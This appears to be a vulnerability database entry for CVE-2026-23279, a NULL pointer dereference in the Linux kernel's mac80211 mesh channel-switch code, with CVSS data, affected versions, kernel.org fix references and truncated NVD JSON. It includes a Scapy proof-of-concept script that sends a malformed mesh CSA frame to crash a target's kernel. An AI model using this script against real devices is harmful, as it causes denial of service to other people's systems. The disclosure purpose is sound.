CVE-2026-23279

Description

In the Linux kernel, the following vulnerability has been resolved: wifi: mac80211: fix NULL pointer dereference in mesh_rx_csa_frame() In mesh_rx_csa_frame(), elems->mesh_chansw_params_ie is dereferenced at lines 1638 and 1642 without a prior NULL check: ifmsh->chsw_ttl = elems->mesh_chansw_params_ie->mesh_ttl; ... pre_value = le16_to_cpu(elems->mesh_chansw_params_ie->mesh_pre_value); The mesh_matches_local() check above only validates the Mesh ID, Mesh Configuration, and Supported Rates IEs. It does not verify the presence of the Mesh Channel Switch Parameters IE (element ID 118). When a received CSA action frame omits that IE, ieee802_11_parse_elems() leaves elems->mesh_chansw_params_ie as NULL, and the unconditional dereference causes a kernel NULL pointer dereference. A remote mesh peer with an established peer link (PLINK_ESTAB) can trigger this by sending a crafted SPECTRUM_MGMT/CHL_SWITCH action frame that includes a matching Mesh ID and Mesh Configuration IE but omits the Mesh Channel Switch Parameters IE. No authentication beyond the default open mesh peering is required. Crash confirmed on kernel 6.17.0-5-generic via mac80211_hwsim: BUG: kernel NULL pointer dereference, address: 0000000000000000 Oops: Oops: 0000 [#1] SMP NOPTI RIP: 0010:ieee80211_mesh_rx_queued_mgmt+0x143/0x2a0 [mac80211] CR2: 0000000000000000 Fix by adding a NULL check for mesh_chansw_params_ie after mesh_matches_local() returns, consistent with how other optional IEs are guarded throughout the mesh code. The bug has been present since v3.13 (released 2014-01-19).

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel >= 3.13

Linux Kernel 6.17.0-5-generic

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# Scapy PoC Concept for CVE-2026-23279
# Triggers NULL pointer dereference in mac80211 mesh_rx_csa_frame

from scapy.all import *

conf.iface = 'wlan0' # Change to your interface

# Target and Source MACs
target_mac = "AA:BB:CC:DD:EE:FF"
source_mac = "11:22:33:44:55:66"
bssid = source_mac

# Construct the Action frame (Spectrum Management -> Channel Switch)
# Must include Mesh ID and Mesh Config to pass mesh_matches_local()
# Must EXCLUDE Mesh Channel Switch Parameters IE (ID 118) to trigger crash

frame = RadioTap() / \
        Dot11(type=1, subtype=13, addr1=target_mac, addr2=source_mac, addr3=bssid) / \
        Dot11Action(category=SpectrumManagement) / \
        Dot11ActionChSwSwitch(new_ch=6) / \
        Dot11MeshID(meshid='meshnet') / \
        Dot11MeshConf() 
        # Intentionally omitted: Dot11MeshChSwParameter

sendp(frame, verbose=1)
print("PoC sent: Malformed Mesh CSA frame without Channel Switch Parameters IE")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23279
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23279
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23279/
[4] VulDB https://vuldb.com/cve/CVE-2026-23279
[5] https://git.kernel.org/stable/c/017c1792525064a723971f0216e6ef86a8c7af11
[6] https://git.kernel.org/stable/c/22a9adea7e26d236406edc0ea00b54351dd56b9c
[7] https://git.kernel.org/stable/c/2b5f282b1b7241ef624c3399a1cdff0bb1a3eeab
[8] https://git.kernel.org/stable/c/753ad20dcbe36b67088c7770d8fc357d7cc43e08
[9] https://git.kernel.org/stable/c/be8b82c567fda86f2cbb43b7208825125bb31421
[10] https://git.kernel.org/stable/c/cc6d5a3c0a854aeae00915fc5386570c86029c60
[11] https://git.kernel.org/stable/c/f061336f072ab03fd29270ae61fede46bf8fd69d
[12] https://git.kernel.org/stable/c/f5d8af683410a8c82e48b51291915bd612523d9a

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23279", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-25T11:16:22.333", "lastModified": "2026-05-22T00:37:25.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mac80211: fix NULL pointer dereference in mesh_rx_csa_frame()\n\nIn mesh_rx_csa_frame(), elems->mesh_chansw_params_ie is dereferenced\nat lines 1638 and 1642 without a prior NULL check:\n\n ifmsh->chsw_ttl = elems->mesh_chansw_params_ie->mesh_ttl;\n ...\n pre_value = le16_to_cpu(elems->mesh_chansw_params_ie->mesh_pre_value);\n\nThe mesh_matches_local() check above only validates the Mesh ID,\nMesh Configuration, and Supported Rates IEs. It does not verify the\npresence of the Mesh Channel Switch Parameters IE (element ID 118).\nWhen a received CSA action frame omits that IE, ieee802_11_parse_elems()\nleaves elems->mesh_chansw_params_ie as NULL, and the unconditional\ndereference causes a kernel NULL pointer dereference.\n\nA remote mesh peer with an established peer link (PLINK_ESTAB) can\ntrigger this by sending a crafted SPECTRUM_MGMT/CHL_SWITCH action frame\nthat includes a matching Mesh ID and Mesh Configuration IE but omits the\nMesh Channel Switch Parameters IE. No authentication beyond the default\nopen mesh peering is required.\n\nCrash confirmed on kernel 6.17.0-5-generic via mac80211_hwsim:\n\n BUG: kernel NULL pointer dereference, address: 0000000000000000\n Oops: Oops: 0000 [#1] SMP NOPTI\n RIP: 0010:ieee80211_mesh_rx_queued_mgmt+0x143/0x2a0 [mac80211]\n CR2: 0000000000000000\n\nFix by adding a NULL check for mesh_chansw_params_ie after\nmesh_matches_local() returns, consistent with how other optional IEs\nare guarded throughout the mesh code.\n\nThe bug has been present since v3.13 (released 2014-01-19)."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nwifi: mac80211: corrige la desreferencia de puntero NULL en mesh_rx_csa_frame()\n\nEn mesh_rx_csa_frame(), elems->mesh_chansw_params_ie es desreferenciado en las líneas 1638 y 1642 sin una verificación de NULL previa:\n\n ifmsh->chsw_ttl = elems->mesh_chansw_params_ie->mesh_ttl;\n ...\n pre_value = le16_to_cpu(elems->mesh_chansw_params_ie->mesh_pre_value);\n\nLa verificación mesh_matches_local() anterior solo valida el ID de Malla, la Configuración de Malla y los IEs de Tasas Soportadas. No verifica la presencia del IE de Parámetros de Cambio de Canal de Malla (ID de elemento 118). Cuando un frame de acción CSA recibido omite ese IE, ieee802_11_parse_elems() deja elems->mesh_chansw_params_ie como NULL, y la desreferencia incondicional causa una desreferencia de puntero NULL del kernel.\n\nUn par de malla remoto con un enlace de par establecido (PLINK_ESTAB) puede activar esto enviando un frame de acción SPECTRUM_MGMT/CHL_SWITCH manipulado que incluye un ID de Malla y un IE de Configuración de Malla coincidentes, pero omite el IE de Parámetros de Cambio de Canal de Malla. No se requiere autenticación más allá del emparejamiento de malla abierta predeterminado.\n\nFallo confirmado en el kernel 6.17.0-5-generic a través de mac80211_hwsim:\n\n BUG: desreferencia de puntero NULL del kernel, dirección: 0000000000000000\n Oops: Oops: 0000 [#1] SMP NOPTI\n RIP: 0010:ieee80211_mesh_rx_queued_mgmt+0x143/0x2a0 [mac80211]\n CR2: 0000000000000000\n\nSolución añadiendo una verificación de NULL para mesh_chansw_params_ie después de que mesh_matches_local() retorne, consistente con cómo otros IEs opcionales son protegidos a lo largo del código de malla.\n\nEl error ha estado presente desde la v3.13 (lanzada el 19-01-2014)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.13", "versionEndExcluding": "5.10.253", "matchCriteriaId": "512D3BE1-F397-4991-A971-F2882ABDCCF0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.203", "matchCriteriaId": "20DDB3E9-AABF-4107-ADB0-5362AA067045"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExclud ... (truncated)